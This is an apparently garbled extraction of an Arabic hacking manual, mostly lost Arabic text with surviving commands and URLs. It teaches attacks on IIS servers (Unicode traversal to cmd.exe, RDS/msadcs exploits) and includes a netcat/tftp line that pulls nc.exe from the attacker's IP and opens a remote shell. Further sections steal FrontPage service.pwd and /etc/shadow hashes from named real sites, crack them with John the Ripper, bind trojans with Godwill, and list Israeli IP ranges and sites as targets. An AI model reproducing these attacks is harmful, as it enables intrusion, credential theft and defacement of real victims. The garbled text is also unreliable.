IIS4.0 IIS5.0 80
)) (( .
------------ - :
------------ CGI-Scanner -1 .. Whisker
) :
( www.wiretrip.net/rfp
-2 )
:
( /http://www.activestate.com
368

-3 ) ( .. IIS

#########################
#########################
#########################

###########
# Game Starts !#
###########

---------------- : IIS Hack.exe


--------------- eEye
nc.exe
.. 80
cmde.exe
369

. Administrator
NC.exe IIS Hack.exe
. /http://www.technotronic.com

..
nc.exe
) (Htdocs IIS
. wwwroot
: IISHack.exe
c:\>iishack.exe
http://www.target.com/ 80
your_IP/ncx.exe
. :
/c:\>nc http://www.target.com
eGG SheLL
: IIS4.0
)) (( .
do you want me to explain what to
do next, hey common you must be
kidding
370

....hehe...

-----------------: MDAC = RDS


---------------- )
%40 ..
.
..
. SYSTEM . ..
. .
. ..
. c:\>nc -nw -w :
2 http://www.host.com/ 80
GET /msadc/msadcs.dll HTTP :
application/x_varg :
. )) (( ..

www.wiretrip.net/rfp :
(( mdac.pl - msadc2.pl )) v
c:\> mdac.pl -h host.com
371

Please type the NT commandline


you want to run (cmd /c
assumed):\n
cmd /c

echo hacked by me hehe > :
C:\inetpub\wwwroot\index.htm
.
Hacker's Swiss knife Army
Nc.exe :
systemroot%&&tftp -i YourIP GET%
nc.exe&&del ftptmp&& attrib -r
nc.exe&&nc.exe -l -p 80 -t -e
cmd.exe
))
((
. 80
Administrator
.

-------------------------------------372

-: Codebrws.asp & Showcode.asp


------------------------------------- ASP IIS

. ..

)) asp.
(( .
. . ))
. (( :
http://www.victim.com/msadc/sampl
_.es...nt/repair/sam
. & Expand it
.. Crack it. LC3.0
) 24 ( .

-------------- : Null.htw
----------- ..
..
373


.. ASP
:
?http://www.victim.com/null.htw
CiWe...HiliteType=full

. Default.asp

---------------------- : webhits.dll & .htw


--------------------- . :
http://www.victim.com/blabla.htw
format of the :
QUERY_STRING is invalid
. . %90
:
www.victim.com/xxxxxxxxx/xxxxxxx
x/x...hilitetype=full

XXXXX/XXXXX/XXXX/XXX.htw
374

, :
iissamples/issamples/oop/qfullhit.ht
w
iissamples/issamples/oop/qsumrhit.
htw
isssamples/exair/search/qfullhit.htw
isssamples/exair/search/qsumrhit.ht
w
.
.. LC3

-----------------------------------------------]ASP Alternate Data Streams [::


-: $DATA
----------------------------------------------- . .. 1998
IIS3.0
.. IIS4.0
))
((
375



Global.asa

http://www.victim.com/default.asp::
$DATA

------------------ : ASP dot bug


----------------- .
. ..
. .. 1997
:
http://www.victim.com/sample.asp.

. IIS3.0

------------------------------------ : ISM.DLL Buffer Truncation


376

-----------------------------------
..

.. .
..
ISM.dll
)( 20%
. Space
:
http://www.victim.com/global.asa
%20(...<=230)global.asa.htr
<=230. 230
.. %20
.. IIS 4.0&5.0

. ,

ISM.dll
..
..
. .
377

Rebot . Logout & Login

----------: htr.+
-------- .
. ASP
:
http://www.victim.com/global.asa+.h
tr

------------- : site.csc
-----------
DNS DSN, UID
.. and PASS Database
:
http://www.victim.com/adsamples/c
onfig/site.csc
378

. ..
.

"
"UniCode
> <
><Dark Devil :
379

. ::
.


.



)
.... (



.
)( Trust Me

::
:
====

Found On 15 May 2001 BY
380

NSFOCUS
::
All running IIS 4 / IIS 5 web server
Windows 2k
Windows 2k SP1 + SP2
::
)
IUSR_machinename
( account
cgi

) DeCode
(


::
http://iisserver/scripts/..%5c..
381

<=== %...md.exe?/c+dir+c
<==== /http://iisserver

* - /scripts/
)
( .
cgi

( executable directory

iis
:: iis
executable directory

)

(
382

* <=== winnt/system32/cmd.exe
cmd
)
cmd . ping
netstat .... traceroute
(
* - . .

) (
.
argument

copy .


argument /c c/

:: 2000
cmd ) (?/ cmd
, .

383

::
Starts a new instance of the
Windows 2000 command interpreter
CMD [/A | /U] [/Q] [/D] [/E:ON |
/E:OFF] [/F:ON | /F:OFF] [/V:ON |
[/V:OFF
[S] [/C | /K] string/]]
C Carries out the command/
specified by string and then
terminates
K Carries out the command/
specified by string but remains
S Modifies the treatment of string/
(after /C or /K (see below
Q Turns echo off/
D Disable execution of AutoRun/
commands from registry (see
(below

::
384

Starts a new instance of the


Windows 2000 command interpreter

2000
cmd
. arguments
arguments
c/ ::
Carries out the command specified
by string and then terminates
.

::
argument
k/ ::
Carries out the command specified
by string but remains

)

ping (
argument Q/
385

echo

arguments
)
c/ ( k/
on off
cmd )
(

MCSE


arguments
c/
.

, cmd.exe


:: .

Ping.exe+PRINT cmd.exe?/c
386


). ( enjoy this ::
http://issserver/scripts/..%5c..
%.../ping.exe+PRINT
* - +c/ c/
argument cmd.exe
cmd + /
c .

+

.
**
. )
(
decode

simplyfiey
::
387

%255c..%255c../
..../



iis check


iis
check

. iis
check

check


( slash) /

::
388

computer logic
HexaDecimal
Values values

/ hex value
::
20% : )(space

hex values
,
hex values


decode

( slash) /
::
hex value = /
, 5c%
/ value

389



iis

value
hexadecimal values
::
%25 = %
%35 = 5
c = %63
iis checker

/
.



simplify

390


::
%255c %25 = % 5 = 5 c = c = %5c
%%35c % = % %35 = 5 c = c = %5c
c = = %63 5 = %35 % = % %%35%63
%5c
%63 5 = %35 % = %25 %25%35%63
= c = %5c
/= 5c% :


5c% / = 5c%
iis
. checker


::
http://iisserver/scripts/..%5c..
%...xe?/c+dir+c:+/s
391


s/+






.
MCSE
) (
2000
.WIN2000 RESOURCE KIT

392

"
"
> : <
..
. .



.....
******************
393

...

.
.....
.
2000 .
. . IIS :
*1 .
*2 .
*3 "
".
*4 .IIS
..

:
wwwroot
Inetpub
IIS
/http://127.0.01


394


/http://127.0.0.1

.

"
"
> <

395

><De\/iL Ni9hT :
= =-,,,

)),,,,((


=-

=-

.. =-
=-
396


=-






= =




)) ((


397

-1

)) ((

-2

/http://www.name.8m.com
.
FreeServerS

))....8m.s5


)) ((
))
((


398




))
((


=-



IE 5 IE 5.5

399


)) "
"((




,,,,
keykey2000



.
http://www.mikkotech.com/kk2000pr
o.exe

400

SN: K100-43-109-0793218E876A4C9-29


godwill
. 5
))5.5 ((
http://www.thecorpz.org/activex/gw
package.zip

==================== ====
=================

.

401


enter

Upx ))
((
Html .

General options

enter exe file
))
((
enter html
use default
402

page.
HTA File Name

Done. ))
((

http://www.thecorpz.org/html/active
sploits.html
===================
403

====================

.

. .

))
,,((
.

" "
> <
><Linux Girl :
404


) ( cookies

. .
..

...
. :
-1 .
-2 .
-3 .
-4 : .

.



405

.







.


IP
. .
Log Files
.



.
406

.


.

"
"
.
.

.




.
.
:
...
407


: :
. setcookie
:
:code

boolean setcookie ( string name [,


string value [, int expire
]string path [, string domain [, int ,
([[[[[secure

:
408

: name ...

.
: value ... ...
...
... :
. serialize
.
unserialize .
: expire )
1 ( 1970 .
. ... :
<- :
.
<- : .

.
<- : 409

. .
:
:code
>?
setcookie('site','http://www.palhack
;(erz.com/',time()+3600
?<

time

) 1 . (1970
:


.

410

:
:code
>?
;(setcookie('site','',time()-360000
?<

:
-1
. .
-2
.
:
setcookie
.. :
:code

411

<html>
<body>
?>
setcookie('site','palhackerz.com',tim
;(e()+20000
echo " Alfjr.com : the best islamic
;"forum
<?
<body/>
<html/>


412

... setcookie ?<


:
:code
?>
setcookie('site','palhackerz.com',tim
;(e()+20000
<?
<html>
<body>
echo " palhackerz.com : the ?>
<? ;"best Hacking forum
<body/>
<html/>

413


:
..
.
.
. PHP ...

$_COOKIE
Associative Arrays
.
:
:code
>?

414

;['echo $_COOKIE['site
?<

:
:code
palhackerz.com
:
. .

..
-1 : user.php. :
<- : . <- :
-2 index.php
. user.php
415

:
: user.php -1
:code
?>
-----------------------*/
Cookies-Based Background
..Selector
Created By :
<"Rasha"<rasha@h4palestine.com
For : h4palestine.com
/*-------------------------

416

}()function display_form
<?
<html>
<body>
<-- Color setting Form --!>
form name=color_select>
<"method="GET
INPUT type="hidden" name="do">
<"value="set_color
INPUT name="color" type="text">
"=value
<"<? ;()echo get_color ?>

417

="INPUT type="submit" value>


<"
<FORM/>
<-- Color Clearing Form --!>
form name=color_clear>
<"method="GET
INPUT type="hidden" name="do">
<"value="clear_color
=" INPUT type="submit" value>
<"
<FORM/>
?>

418

}()function set_color
;global $_GET
setcookie('color',
;($_GET['color'],time()+36000
;('header('Location:index.php

}()function get_color

419

;global $_COOKIE
}((['if(isset($_COOKIE['color
;['return $_COOKIE['color
}else{
;"return "#FFFFFF
{
{

}()function clear_color
setcookie('color',
;($_GET['color'],time()-36000

420

;('header('Location:index.php
{

selection //

}('if ($do=='display_form
;()display_form
}("elseif ($do=="set_color{
;()set_color
}("elseif ($do=="clear_color{
;()clear_color
421

{
?<

display_form. .
set_color. .
.
get_color
.
clear_color. .
-2 : index.php
get_color
user.php :
:code

422

<html>
BODY bgcolor="<?>
;('include('user.php
<"<? ()echo get_color
<h1/>..... < h1>
<br>

<br>

a href="user.php?>
"< do=display_form
<a/>

423

<body/>
<html/>

424

425

" God
Will "
> <
> : <
:
** html .
** ).
34 (
** Godwill .
:
_http://www.geocities.com/love2002
il/godwill16.zip
tlsecurity :
:
html
Godwill
...
426

html ...

427

General Options
...

428


Done
...

429

Gen

...enter Output 3
...


/http://www.tripod.lycos.co.uk
...
....

) ( zone Alarm
.
430

...
...
.

"
"NOOP4
> <
>< .MoHfOx. :

431

god will
.

.. godwill


noob 4.0

=============================
==========
=============================
-1

432

========
=============================
==
=============================
layout 2<<<<====:::
6
-2 Internet
Explorer 5
-3 Internet
Explorer5.5
4 5
433


-6 .

=============================
=====================
===================
executable file 3
<<<<====:::
-7
-8

434

=============================
==========
=============================
-9
<<<<====:::

435

...

436

"
"
><
><. ( T.O.L. ( DeXXa :
:
* . .
* FrontPage Server
Extensions .

437

* Microsoft Office
. FrontPage
* . CHMOD
* . Telnet
* . HTTP
* . SQL
*
. Server Side Scripting
. Language






Screen
. Capture
@ :
.
438

.
. FrontPage Server
Extensions
. FrontPage Extension
Server
. FrontPage Extension
Server
. FrontPage.

@
* FrontPage Server
. Extensions
* .
* .
* .
.
@ :
439



PHP
CGI Perl SSL FTP . SQL
Webmasters

Microsoft Office FrontPage

Office

. .
@ FrontPage Server
Extensions
) : .
(

440

.
Server
.
:
private_/
vti_bin_/
vti_cnf_/
vti_log_/
vti_pvt_/
vti_txt_/
:
* _: vti_bin
:
) : _
( vti_bin
441

/vti_adm_/..
/vti_aut_/..


.
:
shtml.exe/..
fpcount.exe/..
* _: vti_pvt

:
: service.pwd DES
.
: service.grp . authors
442

deptodoc.btr : doctodep.btr
.
.

htaccess.
. )
( .
) : .
(
* _: private
. htaccess.
@ FrontPage
Extension Server

443

FrontPage
Extension Server
. HTTP

FrontPage Request
. . FrontPage
Extension Server
.
fpcount.exe
Extension Server .

.
@ FrontPage Extension
: Server

FrontPage

444

FTP

. .

: FrontPage Extension Server
) : XP
.
(
* FrontPage
. Office
* File . Open Web
* )
( .
* .


.
*


445


.
@ FrontPage
. :

:
* :
) : _ vti_inf.html

(
. FrontPage. .
_ vti_inf.html :
http://www.Victim.com/_vti_inf.html
446

FrontPage Configuration Information


FrontPage Extension
Server
. .
:
. Source Code
"FPVersion="Version Version .
* _: vti_cnf
. FrontPage. .
:
http://www.Victim.com/_vti_cnf
447

. Source Code
:vti_generator:Programe
Programe Microsoft
FrontPage X . X
* :
. FrontPage. .
. Source Code
> <Head></Head :
>"Meta Name="GENERATOR
<"Content="Programe
448

Programe Microsoft FrontPage X.0


.

. X
* : NetCraft
. NetCraft.net . //:http .

FrontPage
mod_frontpage/X X
. FrontPage Extensions Server
* : Telnet

449

) :
.
(
Start Run . Telnet
80 :Microsoft Telnet> Open
www.Victim.com 80
Request. Method . Head
) : .
( HTTP
http://www.Victim.net
ISP.net
:
450

Head www.Victim.net HTTP/1.1


Host: ISP.net
*/* :Accept
Connection: close
. Response . Server
.

FrontPage
mod_frontpage/X
X FrontPage
. Extensions Server
@ :

_ vti_pvt :

451

) : . .
PHP
(
* .
* PHP
:
>?PHP
;("open = FOpen($file, "r$
;((get = FGets($open, FileSize($file$
;Echo $get
;FClose $open
?<
PHP. .


452



file
:
http://www.Victim.com/uploded_file.
..../../etc/passwd
uploded_file

. .

453

454

"
"
> <
> :<
.//
NT - Unix
-1 .
frontpage.
455

:
netcraft/http://www.netcraft.com

mod_frontpage/x
)=x (
/_vti_inf.html
:
/http://www.almodammer.com

http://www.almodammer.com/_vti_i
nf.html
Enter

Frontpage Configuration
Information

.
456


/_vti_cnf
:
http://www.almodammer.com/_vti_c
nf

source

vti_generator:Programe

Programe

------------------------------------------------- -2 frontpage

frontpage


/http://www.almodammer.com
fontpage _vti_pvt
457


http://www.almodammer.com/_vti_p
vt

:
=============
Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
=============


username:passwd
.

service
user / password

458

operator:hi9LHn9wAMuKM
.operator:
hi9LHn9wAMuKM:



=)=(Crack Jack
=)=(John The Ripper
.
John The Ripper
::
http://www.openwall.com/john


\c:
RUN
txt passwd

459


start
run

command
Enter
DoS
RUN

.
cd..

>\c:

cd john
Enter

>c:\john

cd RUN

>c:/john/RUN
460

John The Ripper

====
john -i:all passd.txt
-------------------------
====
john -i:Alpha passwd.txt
---------------------------------
====
john -i:Digits passwd.txt
--------------------------------- .
====
john -single passwd.txt
--------------------------------
.
461

------------------------------------------------------------------------------

john.pot


------------------------------------------------------------------------------ username
password
!!

/
)(1
frontpage

file
open web
462



)(2
FTP
FTP
ws-ftp
pro ftp
...
DOS

=============================
=========

google
/http://www.google.com

/_vti_pvt

463


/http://www.altavista.com

link:service.pwd
..
link:adminstrators
password
.

464

" "
><
> :<
Random Hacking465

CGIScripts
Random Hacking


spiders
altavista.com
) link:xxxx.cgi or pl
(
help.cgi link:help.cgi
Ikonboard
HTML
help.cgi

http://www.example.com/cgibin/help.cgi

http://www.example.com/cgi466

bin/help.cgi?helpon=../members/
[member].cgi%00
] [member
][

Ikonboard
2.1.7

CGIScript

url



Exploit
http://www.secure.f2s.com/eng_ver/
/bugs

/http://www.securiteam.com



467


....

...

CGIScripts

!!



(:

sites 12610 co.il
sites 1104 org.il sites 70
ac.il .sites 78 gov.il
.sites 54 net.il 29
.sites muni.il sites 2009
com .sites 137 net org -
.121 sites .edu - 4 sites
468

.israel.net - 84 sites .il - sites


........
http://iguide.co.il/sites/sites.htm

/http://www.achla.co.il
http://www.reshet.co.il/data/index.vs
?dw=1
/http://www.maven.co.il
/http://www.tapuz.co.il
/http://www.walla.co.il
http://www.info.gov.il/find.pl
. altavista.co.il

.

469


/w3-msql
proxy.isp.net.sa :8080
GET

GET http://www.com.il/cgi-bin/w3msql/ HTTP/1.0


Accept: image/gif, image/x-xbitmap,
*/* ,image/jpeg, image/pjpeg
Accept-Language: ar-sa
User-Agent: Mozilla/4.0 (compatible;
(MSIE 5.5; Windows 98
Host: www.com.il
Proxy-Connection: Keep-Alive

/http://www.com.il/cgi-bin
/cgi-bin/w3-msql

WWWMSQL
470



cgi-bin/w3-msql


WWWMSQL

w3-msql
Exploit w3-msql

http://www.securiteam.com/exploits
/2WUQBRFS3A.html

Random Hacking
w3-msql

/vti_pvt_/


HTML *.
html ..
The page cannot be displayed
471

Forbddien .... not found....



..
.....

url c

perl Shell *.sh
Batch

perl exploit.pl exploit

(:

(:

> perl
exploit.pl > log.htm

Exploit
472




) ( RedHat 6.2
.

"
"
><
>< marwan911 :


. .

473

:IIS ) .
(
:apache
.


.

http://www.netcraft.net

474


whitehouse.org
: //:http /
http://uptime.netcraft.com/up/graph.
...whitehouse.org

The site www.whitehouse.org is
running Microsoft-IIS/5.0 on
Windows 2000


IIS5.0
. 2000
475


IIS5.0 )
(
. 2000
) (



IIS
.
.


476



.

www.arank.com

The site www.arank.com is running
)Apache/1.3.20 (Unix
mod_gzip/1.3.19.1a mod_perl/1.26
mod_bwlimited/0.8 PHP/4.0.6
mod_log_bytes/0.3
FrontPage/5.0.2.2510 mod_ssl/2.8.4
OpenSSL/0.9.6 on Linux

477

apache 1.3.20
FrontPage/5.0.2.2510
. Linux


.



_ vti_pvt _ private


service.pwd users.pwd
478

authors.pwd adminstators.pwd

)
%70
(

goodyco:CalXS8USl4TGM

http://www.goody.com.sa/_vti_pvt/s
ervice.pwd
goodyco
CalXS8USl4TGM
john the
repaier
) (

john -i PASSWORD.FILE
479


.
.



.
telnet .

.
c

================
480

/http://neworder.box.sk
) ( IIS
apache

/http://www.ussrback.com
EXPLOITS

.. c perl
.

"
"
481

> <
>:

.



( -1. .

( - ) IIS (
( - ) apachc (
( -2 .
( -3
( -4
482

IIS







.
apachc

483

.

. .

" )>&<(
"
> <
> : <
* :. (:
* : D:

484

* : ,
.
* : ,
, !!

* : , (:
* : (:

:2 ,
. .
:2 D:

NT & Unix
, FrontPage
(:
:
Administrator.pwd
Administrators.pwd
Authors.pwd
Users.pwd
485

_vti_pvt
:
http://www.tradesystemlab.com/_vti
(: _pvt/service.pwd
service.pwd
:
-FrontPage- #
tradesys:FpNTpIDWSk872
. (:

:3 ,
S:
: .
, WS_FTP www
ftp ftp.ebnmasr.com :
,
. (:

:4
. :
486

tradesys:FpNTpIDWSk872 )(N
:4 !! ,
John The
, Ripper :
http://www.openwall.com/john

:5 , . ,

:5 !! , , (:
: ,
, doc & run :
, run :

: p:
command.com :
, run
:
tradesys:FpNTpIDWSk872
txt passwd run
, , john.exe
command.com :
487

<< john -single passwd.txt


.
<< john -i:Digits passwd.txt
.
<< john -i:Alpha passwd.txt

<< john -i:all passwd.txt
) , .
, ( D:

john.pot :

:6 , ,

:6 . ,
;( , .

(:

488

:7 , ) , (Y
.
:7 :
, tradesys:FpNTpIDWSk872
. ) tradesys :
( :

:8 ,
$:
:8 ,,, ;( ,
,

) ( D:
(:

:9 ,
, (:

: , :
. spiders
489

,
. ,
, walla.co.il :
,
;( .

:10 ,
, !!
:10 .
, $:
, ,
,(: (: service.pwd :
(:

:11 , ,
(:
:11
, EXPLOITES
, , (:
490

, EXPLOITES
. /http://www.ussrback.com :

" CgiScaner
"
><
> : <

491

1.
2 .
3 .
4 .

.
..
http://mypage.ayna.com/vox9
9/cgiscan3.zip

492

"
"
> <
> :<
::: .

493

,,,


,,

.
.

...

494

. ::




27374 . 1243

495


**



.

496



------------


+

........ ,,,,

497

...
http://mypage.ayna.com/a7lla
1/superscan.zip

---------------212.150.13.1
<--------212.150.32.255
-----------------62.0.150.1
<----------62.0.180.255
---------------199.203.75.1
<--------199.203.72.255
---------------139.92.208.1
<--------139.92.208.255
---------------192.114.42.1
<--------192.114.42.255
----------------216.72.43.1
<---------216.72.43.255
--------------212.143.113.1
<-------212.143.113.255
498

---------------209.88.198.1
<--------209.88.198.255
---------------212.29.238.1
<--------212.29.238.255
--------------193.128.102.1
<-------193.128.102.255
--------------192.117.236.1
<-------192.117.236.255
----------------213.8.204.1
<---------213.8.204.255
---------------212.25.120.1
<--------212.25.120.255
----------------128.139.1.1
<---------128.139.1.255
<-------------212.2.224.1
<------------212.2.227.255
<--------------212.26.1.1
<-----------212.26.255.225
<-------------213.238.0.1
<-----------213.238.20.255
<-------------212.102.1.1
499

<------------212.102.3.255
<-----------212.116.190.1
<----------212.116.195.255
<------------212.106.60.1
<-----------212.106.70.255

<-------------195.229.6.1
<-----------195.229.31.255
<-----------195.229.224.1
<----------195.229.255.255
<------------194.170.30.1
<-----------194.170.30.255
<--------------213.42.1.1
<-----------213.42.255.255
<--------------208.7.70.1
<-------------208.7.80.255
<-----------195.226.240.1
<----------195.226.255.255
<------------195.39.130.1
<-----------195.39.145.255
500

<-------------168.187.1.1
<----------168.187.255.255
<-------------194.133.1.1
<-----------194.133.255.25
<-------------209.58.40.1
<------------209.58.40.255
<------------206.82.133.1
<-----------206.82.133.255
<------------206.49.109.1
<-----------206.49.109.255
<--------------212.72.1.1
<-------------212.72.7.255
<------------193.188.50.1
<----------193.188.200.255

501

" Shadow Scan Security


"
> <
> <
:


502

Shadow
Scan Security


http://www.safety-lab.com/SSS.exe

http://www.e3sar.net/almodammer/S
hadowSecurityScanner5.35.exe
503

:
=============================
===========
SetUp

:

+++++++++++
[] ][1
[] ][2 .
=============================
===========

504

*****& &*****

.
=)
Start


ShadowScanSecurity
(=
-1-

Scanner
-2-

505

=1
4 )
(
=2

=3
4

=4

=5

506

=6
=7
-3-

) (1 -2-
) (2
) (3
-4-

507

+1+
+2+
+ 3+

+4+

+ 5+ :-3-
+ 6+.
+ 7+

-5-

508

Done


-6-
Start Scan

509

1
-5-


"
"

510

> <
> : <

etc/shadow/

etc/shadow/
BSD
etc/master.passwd/
SGI ARIX
etc/shadow/
. . AIX
etc/security/shadow/
)) )) -
)) 64 64
(( (( ((
511

etc/shadow/
)) MD5 ((

)) (( NT - XP - 2000
)) (( LanMan
winnt/system32/config/sam/
)) .
.
((

)) ((
_.winnt/repair/sam or sam/


)) - ((
WINNT
.Windows
512

" ) ( "
> <

:

..
..

..
513

Telnet
..
Telnet .
.
Port
).(
) (Daemon
. .
:
)( )(
)( .. .
) (Telnet
) (Daemon
..
.. .
) .( )
( .

514

Telnet )
( ..
.
.
Daemon
.

. Telnet FTP Client



FileTransfer
Protocol .. 21

. Telnet
FTP Client .
!! FTP

..

-1 Telnet
515

ftp.zdnet.com 21

- Sources Code
l19-sj-zdnet.zdnet.com NcFTPd 220
.Server (licensed copy) ready

Banner FTP
Daemon. zdnet
.

.
-2 . .
Username .. Password
zdnet . Anonymous
. :

- Sources Code
516

user anonymous

.
- Sources Code

Guest login ok, send your 331


complete e-mail address as
.password


- Sources Code

517

pass @zorro

. Anonymous
.
..
)
) @
.
- Sources Code

You are user #552 of 2000-230


.simultaneous users allowed
-230
.Logged in anonymously 230

518

..
..
. .

.
)
( .. !!

. . .

:
)( IP
. .


.. . .
:
PASV
- Sources Code
519

PASV

. IP
) . ( )(
..

- Sources Code

Entering Passive Mode 227


((207,189,69,61,12,41


..
520

) ( IP
. .. 207,189,69,61

3113 = 41 + 256 12


. .. 3113
.
Telnet ftp.zdnet.com
.. 3113

..

( LIST.
(
- Sources Code

LIST
521

.
- Sources Code
Data connection already open; 125
.Transfer starting


.
.


.. PASV
.
522

..

) ( .


.. . CuteFTP!!





http://www.vbip.com/winsock/winso
ck_ftp_01.asp
) (
523

http://www.vbip.com/winsock/winso
( ) ck_ftp_ref_01.htm
http://www.cis.ohio )state.edu/htbin/rfc/rfc0959.html
.(

524

" ) ( "
> <
> :<
:
~~~~~~~~~
. password file password file
) (encryption ) (shadowed

525

-:
~~~~~~~~~

!

) ( Void Eye

526

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~
.
nmap

www.inscure.org/nmap
.
SuperScan

. Perl
Perl
C

( /http://www.7lem.com

. ping
(
)37 - 25 - 23 - 22 - 21
527

(587 - 514 - 513 - 143 - 110 .


...



23
/http://www.7lem.com

/telnet http://www.7lem.com
Windows Linux
SunOS FreeBSD QNX
Linux
...
Linux

---------------------SunOS 5.7
528

---------------------- login :
. SunOS 5.7

).
( .


.
nc http://www.7lem.com/ 80
---------------------.
.
.
Apache/1.3.* Server
.
.
---------------------
529

...

110 25

smtp pop
) ( Linux
host 7lem.com

-:

) (
-:
.
.... . queso
.

/queso http://www.7elm.com

530

queso 80
...
. SunOS 5.7

/http://www.condor.com )
support webmaster ... info (
DNS

.
whois . whois
whois
whois man whois
.


http://www.psyon.org/tools/index.ht
ml


. whois

531


?http://www.google.com/search
q=whois&btnG=Google+Search

~~~~~~~~~~~~~~~~~~~~~~~~~~
. void eye
ShadowSecurityScaner
!! .




532







Apache IIS
CGI Perl PHP
.



..
.




counter
mp3
Don't Tell Me

533



25 23 21
110
Ikonboard v2.1.8b

Ikonboard v2.1.8b
Ikonboard v2.1.7b

cgi pl


% 80
cgi

etc/passwd
. FreeBSD

shadow master.passwd

.. ...

534

++++++++++++++++++++++++

} http://www.fbunet.de/cgibin/nph-
{ %20%20%20%20%20.cgi CGI

....






: timduff.com




.

535




.
i'm from saudi arabia
. .






/../../../../../../../../../../../../../../../../../
/../
!


-:
-1
536

-2 .

.....
-3 ) Perl -
( Cgi
-4
%100

) (
-5
)

(

537

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~



/http://www.timduff.com

)
(
)( sh

shell
* sh.

shell

)(bat
538

)(
C



. gcc
gcc Exploit.c -o Exploit
) *c.
* C. c
++
)* (h.
(


Perl

)
(
539


....

= Exploit

password file~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~


540


----------------------------------------------------------------------------------------------root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/: bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer
Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp
Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/li
b/uucp/uucico listen:x:37:4:Network
Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access
User:/:
nobody4:x:65534:65534:SunOS 4.x
Nobody:/:
541

www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/w
eb/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/
ksh
mirror:x:104:1::/home/mirror:/bin/sh
admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/s
h erl:x:102:1::/home/erl:/bin/sh
landmark:x:1000:1000::/web/landma
rk:/bin/ksh
----------------------------------------------------------------------------------------------


10
.


......
542

~~~~~~~~~~~~~~~~~~~~~~~~~~

.
!...

* = x Shadowed
= EpGw4GekZ1B9U
DES .
FreeBSD
543

13

.

password file
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~
Ctrl + Shift

544


... hwwilson.com
-:
root:x:0:1:Super-User:/:/sbin/sh
root
. root
x

x

0
.

545

Super-User:/:/sbin/sh

++++++++++++++++++++++++++++

) (encryption ) (shadowed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~
shadow file
* x # !
root:x:0:1:Super-User:/:/sbin/sh


root:Q71KBZlvYSnVw:0:1:SuperUser:/:/sbin/sh

Q71KBZlvYSnVw
....
546


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
~~
Crack 5.0a john
the ripper jack the ripper

Crack 5a john the
ripper .
john the ripper .....
547

-:
. wordlist.
.
--------------------------------------------------\ --------------------------------------------------> Q2wrtUo9LPq2R
| } ---> //{ | /---/
| / 1 / wordlist
| _____________ / 0 /
| }{ | | / 1 / / ---------^--------
| word list |----\ / 0
-> Q6LiJ6ct1oUBz /---/
| |_____________|
\ ------song--------// -----------------

..
|
-------------------------------------------------- | --------------------------- -:548



}{ | 5000 ) john
the ripper (700
|
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
john the ripper

john -w:wordlist passwd
wordlist

passwd

----------------------------------------------------------------------------------------------549

Microsoft(R) Windows 98
C)Copyright Microsoft Corp 1981).1998
E:\Desktop\junk\john the
ripper>john -w asswd passwd.txt
by Sola 97,John the Ripper Version
1.3 Copyright (c) 1996
Loaded 1 password
v: 0 c: 6401 t: 0:00:00:01 99% c/s:**
6401 w: *****DONE
E:\Desktop\junk\john the ripper<
---------------------------------------------------------------------------------------------- john.pot


550


...
brute
force
wordlist .
. 3
..
. wordlist


5000
wordlist
brute force
john the ripper.
brute force
john -i passwd
passwd

...
551


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
~

Unshadow !!

) ( shadow file
.
:
552

* = Linux : /etc/shadow token


= SunOS : /etc/shadow token
*
FreeBSD : /etc/master.passwd or
* = /etc/shadow token x
IRIX : /etc/shadow token = x
! = AIX : /etc/security/passwd token
ConvexOS : /etc/shadow or
* = /etc/shadpw token
token passwd

!
etc/security/passwd/

)
(
shadow
----------------------------------------------------------------------------------------------553

root:EpGw4GekZ1B9U:11390::::::
::::::bin:NP:6445:::::: sys:NP:6445
adm:IyEDQ6VoRlLHM:10935::::::
#admin:9z8VMm6Ovcvsc:10935::::::
::::::lp:NP:6445
----------------------------------------------------------------------------------------------
passwd
shadow passwd file
...

http://wilsonweb2.hwwilson.com/etc
/passwd
----------------------------------------------------------------------------------------------root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/: bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
554

lp:x:71:8:Line Printer
Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp
Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/li
b/uucp/uucico listen:x:37:4:Network
Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access
User:/:
nobody4:x:65534:65534:SunOS 4.x
:/:Nobody
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/w
eb/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/
ksh
mirror:x:104:1::/home/mirror:/bin/sh
admin:x:105:1::/home/admin:/bin/sh
555

jerome:x:106:1::/home/jerome:/bin/s
h erl:x:102:1::/home/erl:/bin/sh
landmark:x:1000:1000::/web/landma
rk:/bin/ksh
---------------------------------------------------------------------------------------------- x token

etc/shadow/

http://wilsonweb2.hwwilson.com/etc
/shadow

----------------------------------------------------------------------------------------------root:XOT4AiUKMRcKQ:10643::::::
daemon:NP:6445::::::
bin:NP:6445:::::: sys:NP:6445::::::
adm:NP:6445:::::: lp:NP:6445::::::
smtp:NP:6445::::::
556

